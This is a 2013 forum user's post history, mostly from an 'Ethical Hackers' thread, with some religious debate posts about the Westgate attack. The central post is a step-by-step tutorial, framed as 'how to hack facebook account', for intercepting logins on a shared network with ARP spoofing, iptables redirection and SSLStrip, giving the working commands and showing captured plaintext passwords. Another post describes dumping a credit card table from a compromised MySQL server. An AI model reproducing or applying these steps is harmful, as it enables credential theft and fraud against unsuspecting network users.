Justthinking's Posts
Nairaland Forum › Justthinking's Profile › Justthinking's Posts
 Programming › Re: Ethical Hackers by justthinking(op): 7:15pm On Sep 27, 2013 |
DonCrust: What's up guys... Just thinking i'm still waiting to hear from youxup bro. sorry for not replying u soon enough, my internet av bin fucking up lately an actually using my fone mb t end this message. i wuld to paste the tutorial with pictures and it is not something i can really do using mobile. i will get my internet up soon and i will post the tutorial. am really sorry bro. also i av a tool u might all really be interested in, i will be posting the tutorial with urs very SOON. am really sorry. |
| Islam › Re: Reactions To Westgate Murders By Muslim Scholars/imams by justthinking: 2:48pm On Sep 25, 2013 |
MacLovington: .it is quite funny that u picked my comment and neglect the comment posted by ur christian brother. the comment u quote is a reply to the comment posted by our christian brother. all am saying is that u quoted me out of context just the same way u most christian quote the Holy Quran out of context. just to tell you, av lived with christians all my life. a lived with them as room mate in skl nd we love each other that we call ourself "brother from different mother". i still live with christian right now also. half of my best friends are christian and we only bring up islamic issue anytime we need to knw sumtin. and recently i make frnd with someone online who is a christian and after month of chatting the person told be she cant be my friend becos am muslim so pls dont play the tolerance card here. 1 Like |
| Programming › Re: Ethical Hackers by justthinking(op): 10:45pm On Sep 24, 2013 |
@Slyr0x Are you on any IRC (internet relay chat) |
| Programming › Re: Ethical Hackers by justthinking(op): 10:44pm On Sep 24, 2013 |
i think both of you are right but i dont think centrex has done anytin wrong. what i knw abt vulnerability is that if you find a vulneraability in a software or website you are to tell the company, after some month u can post it on exploit website e.g exploit-db.com, securityfocus e.t.c. so that programmers can protect themself. if u blame centrex for this act, then i think u shuld blame securityfocus that paste vulnerability and exploit-db.com too because they paste the vulnerability and the software and version that is vulnerable. all am saying am siding with centrex if TRULY they av report it to the son.gov.ng programmer or administrator. |
| Islam › Re: Reactions To Westgate Murders By Muslim Scholars/imams by justthinking: 9:39pm On Sep 24, 2013 |
MacLovington: .dat is true to some extent bro. but the thing is the bible especially the new testament have been modified so many times to fit into a perticular perpective, country, ideology e.t.c. if possible try to watch this video https://www.youtube.com/watch?v=IYMKQKSV0bY. 1 Like |
| Islam › Re: Reactions To Westgate Murders By Muslim Scholars/imams by justthinking: 8:46pm On Sep 24, 2013 |
i have been reading the comment here silently. and this is what i notice. observation 1. when the killing was going on THEY said dare is no muslim here to condem the killing. Muslims are terrorist. 2. when a NL post comment of muslim clerics condeming the act. THEY said the muslim clerics are not from well reputable muslim country. so Muslims are terrorist. 3. when a christian like david cameron said it is the killing is not abt religion. THEY said he is only interested in arab money. so Muslims are terrorist 4. when a muslim try to give example of a christian who is also involve in terror. THEY said he stoped going to church wen he was 15. so muslims are terrorist. 5. whem a muslim try to give them islamic verse to back up his clain that this people are not doing that is in the quran. THEY said it is a lie that the islam teaches and encourages killing of non-muslims. so muslims are terrorist. Deduction and pridiction 1. Most of the christians here have already decide on what to blieve before they even ask the question. 2. i wont be surprise if some christian here dont really care abt the killing but just want to use dis avenue to talk bad about islam. 3. nothing will change dare mind even wen the all clerics in the world stand at the same time and condem dis evil act. Advice 1. Muslims here shuld not abuse or argue with them because doing that will yield nothing. because i dont really see this crisis ending soon. the ppl controling this madness are actually getting the response they need. and dey will keep pushing it untill it lead to war(God forbid) we just av to learn how to deal with it and pray that Allah shuld help us stop this madness. 2. i would like the christain here to try to read abt the quran themselve. is it not funny that most muslims here actually knw the bible more than some christians here. it is becos muslims are truth seekers. they just dont want to bliev in what som ppl tell us. we seek for the truth. that is why we knw this extremist are nt muslims. 3. ISLAM IS THE RELIGION OF PEACE 5 Likes |
| Programming › Re: Ethical Hackers by justthinking(op): 10:06pm On Sep 23, 2013 |
Slyr0x: ^^^u are right but if truly they have report this vulnerabilty and son.go.ng didnt do anything about it. then i really dont think it is the fault of centrex. nigeria programmer need to start taking security issue seriously. i might be wrong sha ooo. |
| Programming › Re: Ethical Hackers by justthinking(op): 10:00pm On Sep 23, 2013 |
gr3yb4ck: gr3yb4ck w!ll l!K3 T0 M33T JUST_THINKINGhere i am boss. u can send me your e-mail for us to chat better. and you can also paste your question here boss. |
| Programming › Re: Ethical Hackers by justthinking(op): 9:59pm On Sep 23, 2013 |
DonCrust: just_thinking where have you been? I'm trying to set up a lab. I've already started downloading BT5R3 - Gnome and as soon as its done, I'll need you to walk me through the process.lol. am not on honeymoon boss. ok no problem. try to download sun virtualbox along. you can download it from C:\Users\arotob\Downloads\Programs\VirtualBox-4.2.18-88781-Win.exe . when you have the required software. i will explain how to set it up. |
| Programming › Re: Ethical Hackers by justthinking(op): 4:32pm On Sep 19, 2013 |
curiouslad: @ just_thinkingdude are u on any irc |
| Programming › Re: Ethical Hackers by justthinking(op): 4:20pm On Sep 19, 2013 |
curiouslad: @ just_thinkinglol. u try sha. but am not in ibadan, am in lagos. one tin is i neva really trust geolocation of nigeria ip address. is mostly false. the only true tin is the contry part. wich method did u use to get my ip address. |
| Programming › Re: Ethical Hackers by justthinking(op): 11:13pm On Sep 18, 2013 |
Slyr0x: Which one is that? |
| Programming › Re: Ethical Hackers by justthinking(op): 11:12pm On Sep 18, 2013 |
Slyr0x: Which one is that?Kioptrix level 1 virtual harddisk. neva start playing it though. |
| Programming › Re: Ethical Hackers by justthinking(op): 11:06pm On Sep 18, 2013 |
Slyr0x: Which one is that?Kioptrix v1 |
| Programming › Re: Ethical Hackers by justthinking(op): 5:18pm On Sep 18, 2013 |
Just downloaded level one. |
| Programming › Re: Ethical Hackers by justthinking(op): 4:48pm On Sep 18, 2013 |
Slyr0x: Kali Linux is currently the most advanced and versatile penetration testing suite. .equally maintained and funded by Offensive Security (the creators of Backtrack). .Dat is cool. i will try it out |
| Programming › Re: Ethical Hackers by justthinking(op): 4:01pm On Sep 18, 2013 |
Slyr0x: Nice. .You should upgrade your Bt5 to Kali linuxis it better than BT |
| Programming › Re: Ethical Hackers by justthinking(op): 3:12pm On Sep 18, 2013 |
My Virtual Lab [img][/img]
|
| Programming › Re: Ethical Hackers by justthinking(op): 2:06pm On Sep 18, 2013 |
Slyr0x: ^^^I believe people would appreciate it more if one of us could setup a virtual lab for practicals as against the theory hereI have a virtual lab am using. i use sun virtual box. i av windows xp installed on one, BT5r1 installed on another and my window 7 wich is my host. i network the three together and that is what am using for my testing. blieve the hack above is tested and trusted. |
| Programming › Re: Ethical Hackers by justthinking(op): 11:43am On Sep 18, 2013 |
The URL changed into HTTP. :-) 4. After SSL Strip capturing enough data, to stop ARPSpoof and SSL Strip just hit CTRL + C. After you stop it, the whole network will be down and cannot be accessed for a while(it shouldn’t take long time), this can happen because ARPSpoof didn’t automatically repopulate the ARP tables with router proper MAC address. 5. Inside the SSL Strip folder there will be a new file created "sslstrip.log" that stores all information that already captured over the HTTP protocol and even the HTTPS. Just take a look to the file using your favorite text editor. Below picture is the content of my sslstrip.log :that already captured victim data when they open https://mail.live.com. You can see the plain data of username and password there. Prevention of SSL Strip Attack 1. If you are on public network (internet cafe, unsecured hotspot, etc) minimalize login into your personal account. 2. Use SSH Tunneling (You can see the tutorial here). 3. Keep your eyes open. This fake URL address[img][/img] Different with this one [img][/img]
|
| Programming › Re: Ethical Hackers by justthinking(op): 11:36am On Sep 18, 2013 |
I would like to share how to hack facebook account on the fly Some people asks "Are you sure SSL(Secure Socket Layer) port 443 can be hacked and we know the password sent over the network??"…..how to break ssl protection using sslstrip? What is SSL? Home > SSL SSL E-mail this Term (pronounced as separate letters) Short for Secure Sockets Layer, a protocol developed by Netscape for transmitting private documents via the Internet. SSL uses a cryptographic system that uses two keys to encrypt data − a public key known to everyone and a private or secret key known only to the recipient of the message. Both Netscape Navigator and Internet Explorer support SSL, and many Web sites use the protocol to obtain confidential user information, such as credit card numbers. By convention, URLs that require an SSL connection start with https: instead of http :. Another protocol for transmitting data securely over the World Wide Web is Secure HTTP (S-HTTP). Whereas SSL creates a secure connection between a client and a server, over which any amount of data can be sent securely, S-HTTP is designed to transmit individual messages securely. SSL and S-HTTP, therefore, can be seen as complementary rather than competing technologies. Both protocols have been approved by the Internet Engineering Task Force (IETF) as a standard. when we try to break the encryption it’s a little bit hard to break, but here in this tutorial I will explain how to break the SSL encryption without breaking the SSL encryption using Man in the Middle Attack :-) . Man in the Middle Attack The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. The attacker must be able to intercept all messages going between the two victims and inject new ones, which is straightforward in many circumstances (for example, an attacker within reception range of an unencrypted Wi-Fi wireless access point, can insert himself as a man-in-the-middle).[citation needed] A man-in-the-middle attack can succeed only when the attacker can impersonate each endpoint to the satisfaction of the other — it is an attack on mutual authentication (or lack thereof). Most cryptographic protocols include some form of endpoint authentication specifically to prevent MITM attacks. For example, SSL can authenticate one or both parties using a mutually trusted certification authority. Requirement : 1. Linux OS 2. Arpspoof 3. IPTables 4. SSLStrip 5. NetStat All of this requirements maybe have other dependencies with other packages, I suggest you to use Backtrack Linux for more easier to do this tutorial, because all of the requirement package already installed inside Backtrack Linux(except SSLStrip). Perform the Attack – Man in the Middle Attack 1. Set your Linux box to make it can forward every incoming port(enable port forwarding). echo ’1’ > /proc/sys/net/ipv4/ip_forward This code will let your Linux Backtrack have ability to forward every packet that was not intended for your machine. 2. Know your network gateway netstat -nr [img][/img] For example i’ve already know that my gateway address is 192.168.8.8 3. Use ARP spoof to perform Man in the Middle Attack arpspoof -i eth0 192.168.8.8 a. Change "eth0" to your network card that currently connected to the network. Usually it is eth0 or wlan0. b. Change "192.168.8.8" to your network default gateway. c. In this tutorial I use arpspoof to entire network. Be careful if your network have a large user connected to it, because it will crash your network and bring your network down. SSL Strip Created by Moxie Morlinspike who provides a demonstration of the HTTPS stripping attacks that presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. -Taken from author website- This all happens on the fly, and is practically will invisible to users. The only way to notice is by checking the URL in the address bar where normally it would display HTTPS, it will now display HTTP instead. Install SSL Strip (optional) 1. Download SSL Strip 2. tar zxvf sslstrip-0.9.tar.gz 3. cd sslstrip-0.9 4. python setup.py install Executing SSL Strip Attack 1. We need to set up a firewall rule (using iptables) to redirect requests from port 80 to port 8080 to ensure our outgoing connections (from SSL Strip) get routed to the proper port. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 2. After finished set up iptables, the next step we need to redirect all network HTTP traffic through our computer using ARPSpoof (don’t forget to enable IP forwarding) echo ’1’ > /proc/sys/net/ipv4/ip_forward arpspoof -i eth0 192.168.8.8 [img][/img] 3. When everything running well, you will see that ARPSpoof capturing network traffic, then the next step you need to start your SSL Strip by opening new terminal(CTRL+ALT+T) sslstrip -l 8080 "-l" tells the system to listen on specified port. [img][/img] Above picture tells that SSL Strip already running and waiting for victim opening SSL URL such as (https://mail.google.com; https://mail.yahoo.com; etc) As a victim I will try to open https://mail.live.com. When I open the page, what I see is looks like below picture [img][/img]
|
| Programming › Re: Ethical Hackers by justthinking(op): 3:58pm On Sep 16, 2013*. Modified: 4:22pm On Sep 16, 2013 |
centrex: Centrex Lab is a cyber security company based in Abuja Nigeria , we deal more on cyber intelligence,Black Ops Project and offensive security / Ethical hacking... we are active players on cyber security seminars also, we have train a whole lot of people including FUTMINA CYBER SECURITY DEPT.... you can visit our website on http://centrexethicalab.com/ or google Centrex Ethical Lab to read more about us.... Every September of a given year, we celebrate our cyber security month, where we give a whole lot of stuff to Nigerian citizen to encourage them on the need to be safe onlinethat is cool. keep doing ur good job. |
| Programming › Re: Ethical Hackers by justthinking(op): 9:16pm On Sep 15, 2013 |
megatran: is there a way to use backtrack on vmware to crack wep key wifi passwords..i have bt5r3 installed on my pc but it doesnot find an interface when i scan for wireless networks..i am also thinking if it were possible to have to boot the backtrack from windows and run it like a normal operating system, i dont know if that will be possible..and lastly i would want to know how i can crack wep and wpa-psk wifi using windows operating system..thanks for ur supportdare is no way of connecting vmware to ur wireless card interface(atleast that i know off). which leaves two options which are u eithwe buy external usb wireless card like d-link or u install bt5 on ur system as a normal os. trying to crack wpa using windows. u shuld try learn about aircrack. but am not sure if it is entirely stable on windows. |
| Programming › Re: Ethical Hackers by justthinking(op): 12:13pm On Sep 15, 2013 |
nasonaso: @ just thinking am new to sql u r a bad guy respecttank you boss. u can check a beginner tutorial for sql injection here http://thecybersaviours.com/sql-injection-for-beginners |
| Programming › Re: Ethical Hackers by justthinking(op): 10:19am On Sep 15, 2013 |
megatran: just thinking...cant havij or acunetix actually do the job of metasploit and although i got way confused by ur advance way of begining the topic am sure i can go around getting a newbie lecture. is metasploit used in windows or linux...nice tutorial by the wayi think dey are two different software. metasploit is an exploitation tool probably the best exploitation tool we have. it is use for breaking systems not website. if u luk at the tutorial above. we are attacking a mysql server not a website that uses a mysql database. we didnt do any mysql injection. all we did was try to hack the mysql username and password and once we have it we can analyze the table in the musql. what am saying is that we use metasploit to hack the mysql server directly while software like havij uses the website to hack the mysql server that what we call mysql injection. with dis u dont need to hack the mysql password. all u just av to do is use some programming error to hack the mysql server. i wich to post a mysql injection tutorial soon. tanks for the question bro. and also dare is metasploit for windows but i will strongly advice u to get backtrack OS. it is better than using metasploit on windows because dare are some command u cant use on windows except u av cygwin installed on ur windows os. and also some windows can block sum protocols wen trying to connect and that will hinder the the funtion of metasploit. if u dont mind me asking ware u staying. |
| Programming › Re: Ethical Hackers by justthinking(op): 10:18am On Sep 15, 2013 |
megatran: just thinking...cant havij or acunetix actually do the job of metasploit and although i got way confused by ur advance way of begining the topic am sure i can go around getting a newbie lecture. is metasploit used in windows or linux...nice tutorial by the wayi think dey are two different software. metasploit is an exploitation tool probably the best exploitation tool we have. it is use for breaking systems not website. if u luk at the tutorial above. we are attacking a mysql server not a website that uses a mysql database. we didnt do any mysql injection. all we did was try to hack the mysql username and password and once we have it we can analyze the table in the musql. what am saying is that we use metasploit to hack the mysql server directly while software like havij uses the website to hack the mysql server that what we call mysql injection. with dis u dont need to hack the mysql password. all u just av to do is use some programming error to hack the mysql server. i wich to post a mysql injection tutorial soon. tanks for the question bro. |
| Programming › Re: Ethical Hackers by justthinking(op): 10:17am On Sep 15, 2013 |
megatran: just thinking...cant havij or acunetix actually do the job of metasploit and although i got way confused by ur advance way of begining the topic am sure i can go around getting a newbie lecture. is metasploit used in windows or linux...nice tutorial by the wayi think dey are two different software. metasploit is an exploitation tool probably the best exploitation tool we have. it is use for breaking systems not website. if u luk at the tutorial above. we are attacking a mysql server not a website that uses a mysql database. we didnt do any mysql injection. all we did was try to hack the mysql username and password and once we have it we can analyze the table in the musql. what am saying is that we use metasploit to hack the mysql server directly while software like havij uses the website to hack the mysql server that what we call mysql injection. with dis u dont need to hack the mysql password. all u just av to do is use some programming error to hack the mysql server. i wich to post a mysql injection tutorial soon. tanks for the question bro. |
| Programming › Re: Ethical Hackers by justthinking(op): 10:08am On Sep 15, 2013 |
DonCrust: Nice work @just_thinking. I remember those days when i use to do sql injection, brute force and deface cpanel, penetrating ebay through back door... At times I wish i didn't stopwow dat gr8 boss. u can still share some hacking tips with us naw |
| Programming › Re: Ethical Hackers by justthinking(op): 10:05am On Sep 15, 2013 |
kiddie: u on whatsapp justthinkingnope. i hardly chat but am on 2go. |
| Programming › Re: Ethical Hackers by justthinking(op): 1:30pm On Sep 14, 2013 |
Djtm: thanks.u are welcome |
| Programming › Re: Ethical Hackers by justthinking(op): 12:09pm On Sep 14, 2013 |
Djtm: What??! So how do you prevent that?Simple use a very long password. that doesnt say it wont be hackable but it will make it difficult to. and one thing u shuld remenber about security is that nothing is 100% secure |
| Programming › Re: Ethical Hackers by justthinking(op): 11:03am On Sep 14, 2013 |
The interesting table here is the credit_cards so we would like to see the contents of this table.We will change database with the command use <dbname> and we will execute the command show * from credit_cards; [img][/img] Now we have all the credit cards details from users and all the accounts and passwords from the database.
|
